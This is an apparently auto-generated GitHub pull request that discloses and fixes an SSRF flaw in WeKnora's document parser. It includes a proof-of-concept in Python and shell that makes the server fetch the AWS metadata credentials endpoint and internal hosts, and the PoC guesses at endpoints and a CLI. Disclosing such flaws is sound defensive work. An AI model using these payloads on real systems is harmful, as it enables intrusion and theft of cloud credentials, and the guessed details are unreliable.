[Security] Fix CRITICAL vulnerability: V-001

Open orbisai0security opened this issue 1 month ago • 0 comments

Security Fix

This PR addresses a CRITICAL severity vulnerability detected by our security scanner.

Security Impact Assessment

Aspect	Rating	Rationale
Impact	High	In the WeKnora repository, which appears to be a document parsing and knowledge extraction system, exploiting this SSRF could allow attackers to access internal network resources, potentially exposing sensitive data from connected databases or APIs used for multimodal processing. This could lead to data breaches or further compromise of the system's knowledge graph components, impacting confidentiality and integrity of processed documents.
Likelihood	Medium	Given WeKnora's context as an AI-driven document reader likely deployed in environments processing user-provided content, the attack surface is present if users can submit documents with image URLs. However, exploitation requires crafting malicious URLs and depends on the system's deployment (e.g., public-facing vs. internal), making it moderately likely with targeted attacks rather than opportunistic ones.
Ease of Fix	Medium	Remediation involves implementing URL validation in base_parser.py, such as checking against an allow-list or blocking internal IP ranges, which requires modifying the parsing logic and potentially updating related components for consistency. This could introduce moderate testing effort to ensure no regressions in document processing workflows, but avoids major architectural changes.

Evidence: Proof-of-Concept Exploitation Demo

⚠️ For Educational/Security Awareness Only

This demonstration shows how the vulnerability could be exploited to help you understand its severity and prioritize remediation.

How This Vulnerability Can Be Exploited

The vulnerability in docreader/parser/base_parser.py allows an attacker to perform Server-Side Request Forgery (SSRF) by providing malicious URLs in document content that the parser fetches as images. In the context of WeKnora, a document reader likely used for parsing user-uploaded or shared documents (e.g., PDFs or web content), an attacker can embed URLs pointing to internal network resources, causing the server to make unauthorized requests and potentially expose sensitive data or trigger internal actions. This exploit is straightforward in a web-facing deployment of WeKnora, where documents are processed via API endpoints or file uploads.

To demonstrate exploitation, assume WeKnora is deployed as a web service (common for such parsers, based on typical Tencent projects like this). An attacker needs to provide a document containing a malicious image URL. The following steps show how to craft and deliver such a payload, targeting the base_parser.py logic that fetches images without validation.

# Exploit script: Craft a malicious document (e.g., a simple HTML file mimicking a parsed document)
# This assumes WeKnora accepts document uploads or API inputs for parsing.
# In a real scenario, upload this via the WeKnora web interface or API endpoint (e.g., POST to /parse or similar, based on repo's API structure).

import requests

# Step 1: Create a malicious document payload (e.g., HTML with an embedded image URL)
# The URL points to an internal resource, like AWS metadata service or a local service.
malicious_doc = """
<html>
<body>
<img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" />
</body>
</html>
"""

# Step 2: Encode or prepare the document for upload (WeKnora likely accepts base64 or file uploads)
# Assuming an API endpoint like /api/parse_document (inferred from similar parsers)
files = {'document': ('malicious.html', malicious_doc, 'text/html')}

# Step 3: Send the request to the WeKnora server (replace with actual target URL)
# This triggers base_parser.py to fetch the image URL, performing SSRF.
response = requests.post('http://target-weknora-server.com/api/parse_document', files=files)

# Step 4: Observe the response - if SSRF succeeds, the server will attempt to fetch the internal URL,
# and the response might leak data (e.g., IAM credentials from AWS metadata).
print(response.text)  # Could contain leaked internal data if the URL is accessible.

# Alternative: If WeKnora is a CLI tool or accepts direct file input (based on parser structure),
# an attacker could run it locally or via a compromised environment.

# Step 1: Create a malicious document file
echo '<html><body><img src="http://localhost:8080/internal-api/status" /></body></html>' > malicious.html

# Step 2: Invoke WeKnora's parser (assuming it has a command-line interface like 'weknora parse')
# This would cause the base_parser.py to fetch the internal URL.
./weknora parse malicious.html

# Step 3: Monitor network traffic or logs - the server will make a request to localhost:8080,
# potentially exposing internal service status or data.
# For broader scanning, replace with URLs like http://10.0.0.1:22 (internal SSH) or http://internal-db:5432.

Exploitation Impact Assessment

Impact Category	Severity	Description
Data Exposure	High	Successful SSRF could access sensitive internal resources, such as cloud metadata (e.g., AWS IAM credentials), internal APIs (e.g., database status or user data), or configuration files. In WeKnora's context as a document parser handling potentially confidential documents (e.g., business reports or user-shared files), leaked data might include API keys, session tokens, or proprietary information stored on internal services.
System Compromise	Medium	While SSRF alone doesn't grant direct code execution, it could enable pivoting to further attacks, such as exploiting vulnerable internal services (e.g., an open Redis instance) to gain user-level access or escalate via chained vulnerabilities. In a containerized deployment, this might allow probing for host escapes, but full compromise would require additional weaknesses.
Operational Impact	Medium	An attacker could use SSRF for internal network scanning or DoS by targeting slow/unresponsive internal endpoints, causing resource exhaustion on the WeKnora server. In a high-traffic scenario (e.g., processing many documents), this could degrade service availability, but it's unlikely to cause complete outages without sustained attacks.
Compliance Risk	High	Violates OWASP Top 10 (A10:2021 - Server-Side Request Forgery) and could lead to GDPR breaches if internal data includes EU user information. For Tencent's ecosystem, it risks non-compliance with Chinese data security regulations (e.g., PIPL) if sensitive user documents are processed, potentially triggering audits or fines.

Vulnerability Details

Rule ID: V-001
File: docreader/parser/base_parser.py
Description: The application fetches images from user-provided URLs without validating them against an allow-list or checking for internal IP addresses. This allows an attacker to force the server to make requests to internal network resources.

Changes Made

This automated fix addresses the vulnerability by applying security best practices.

Files Modified

docreader/parser/base_parser.py
internal/mcp/client.go

Verification

This fix has been automatically verified through:

✅ Build verification
✅ Scanner re-scan
✅ LLM code review

🤖 This PR was automatically generated.

Jan 08 '26 09:01 orbisai0security